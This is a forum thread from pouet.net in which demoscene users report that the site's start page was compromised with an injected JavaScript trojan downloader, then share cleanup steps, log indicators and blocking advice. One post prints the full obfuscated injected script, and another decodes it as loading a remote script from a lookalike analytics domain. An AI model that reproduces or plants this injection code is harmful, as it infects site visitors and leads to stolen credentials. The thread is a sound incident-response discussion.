POUET.NET is hacked / infected with a javascript worm
category: general [glöplog]
Attention: Like lots of other scene websites, pouet.net has a trojan infection embedded onto its startpage. Admins, remove it from index.php, change FTP passwords.
This is done by the russian business network, the most criminal spam gang in the world. Lots of other scene website are affected, too.
The trojan sniffs all your FTP traffic, and account data from online banking and lots of other things. The sniffed FTP traffic is then used to login to those accounts and embed the javascript into more pages.
Someone who has FTP access to pouet.net therefore is infected with this trojan, and all his account data is now in the hands of that gang. All users with pouet.net ftp access should check for this trojan now and inform all sites they are logging into by FTP. (And obviously change passwords, credit card numbers etc after the trojan is removed)
For further details, contact me on irc.
This is done by the russian business network, the most criminal spam gang in the world. Lots of other scene website are affected, too.
The trojan sniffs all your FTP traffic, and account data from online banking and lots of other things. The sniffed FTP traffic is then used to login to those accounts and embed the javascript into more pages.
Someone who has FTP access to pouet.net therefore is infected with this trojan, and all his account data is now in the hands of that gang. All users with pouet.net ftp access should check for this trojan now and inform all sites they are logging into by FTP. (And obviously change passwords, credit card numbers etc after the trojan is removed)
For further details, contact me on irc.
Yup - discovered nasty, removed from index, changed password. My AV warned me as soon as I tried to access my own page - can I then assume that I wasn't infected? That hopefully suggests that I didn't already have it...
(er, I mean my untergrund page, obviously)
what javascript worm / trojan ?
tell me more, please.
is it this shit?
Code:
<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else
if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>
need an obscure java contest.
i commented the javascript code from index.php
hope jeffry will go through the logs and clean whatever else is infected.
i recommedn people avoid using pouet for the weekend.
hope jeffry will go through the logs and clean whatever else is infected.
i recommedn people avoid using pouet for the weekend.
I'm busy alerting lots of server admins etc, so only brief info here:
Gang behind all this:
http://www.bizeul.org/files/RBN_study.pdf
If you are a server admin, grep your ftp logs for the following strings:
85.249.131.45
datapoint.ru
58.65.238.26
If you see successfull logins from those ips/hosts, then that user is infected with the trojan, and his website probably also is.
Gang behind all this:
http://www.bizeul.org/files/RBN_study.pdf
If you are a server admin, grep your ftp logs for the following strings:
85.249.131.45
datapoint.ru
58.65.238.26
If you see successfull logins from those ips/hosts, then that user is infected with the trojan, and his website probably also is.
yes, it's two pieces of code mangled twice, that inserts a script tag pointing to:
"http://www.googleanalitics.net/__utb.js"+ document.referrer
"http://www.googleanalitics.net/__utb.js"+ document.referrer
eltopo: yep, thats the code. beer for whoever can crack what it does :D
p01 the drunkard :D
\:D/ people, to be on the safe side, disable JavaScript on pouet.net
a whois on www.googleanalitics.net says:
Extended Info IP Address: 58.65.238.60
IP Location: Hong Kong
Website Status: active
Server Type: Apache
Cache Date: 2008-02-02 08:05:03 MST
Compare Archived Data: 2007-10-03
a whois on www.googleanalitics.net says:
Extended Info IP Address: 58.65.238.60
IP Location: Hong Kong
Website Status: active
Server Type: Apache
Cache Date: 2008-02-02 08:05:03 MST
Compare Archived Data: 2007-10-03
and block www.googleanalitics.net using your browser's blocking mechanism or better directly in your .hosts file
presumably this only affects IE?
i must admit i'm a bit in the blue as to how a javascript file on a web page can find my stored ftp login codes.
In case you didn't know Windows users will find theirs in C:\WINDOWS\system32\drivers\etc\
the hosts file that is
And OS X users in /private/etc/hosts
skrebbel: it doesn't - it's a trojan downloader (not clear yet how it works, but also people not using IE at all are affected). That trojan than sniffs all your traffic locally on your PC (all your ftp sessions, ebay visits, online banking etc), and sends it to the "russian business network".
The sniffed FTP transfers are used to get username/passwords of all FTP sites you visit, the transfers and directory listings are used to find out which files to infect on that site. Later their botnet connects to those servers by FTP, infecting those websites. This is how it spreads.
Trojan infections seem to have started some weeks ago, infection of websites started yesterday evening. According to our logs their bots made test logins using stolen account data from January 8th on before they started infecting yesterday.
The sniffed FTP transfers are used to get username/passwords of all FTP sites you visit, the transfers and directory listings are used to find out which files to infect on that site. Later their botnet connects to those servers by FTP, infecting those websites. This is how it spreads.
Trojan infections seem to have started some weeks ago, infection of websites started yesterday evening. According to our logs their bots made test logins using stolen account data from January 8th on before they started infecting yesterday.
Yesterday evening I had problems logging to Pouet from my Windows box. Instead of pouet, I just got a blank page. I wonder if that's got anything to do with it..
scamp: is that a windows trojan or do they infect linux machines too?
Yes, probbaly. That should be the time they replaced the php files...
p01: that IP is from HostFresh, a cover-up fake ISP run by the RBN:
http://en.wikipedia.org/wiki/Russian_Business_Network
p01: that IP is from HostFresh, a cover-up fake ISP run by the RBN:
http://en.wikipedia.org/wiki/Russian_Business_Network
hmm, demoparty.net seems to be infected too
Ok. Some really strage thngs are going on here. Each time I tried to download SysProt anti-rootkit my browser said the file is corrupted. Then I downloaded it to my shell account. Unpacked it there and downloaded the exe via sftp. Then when it is saved to disk... 1 second later it disappears. Like it is deleted by some external app.
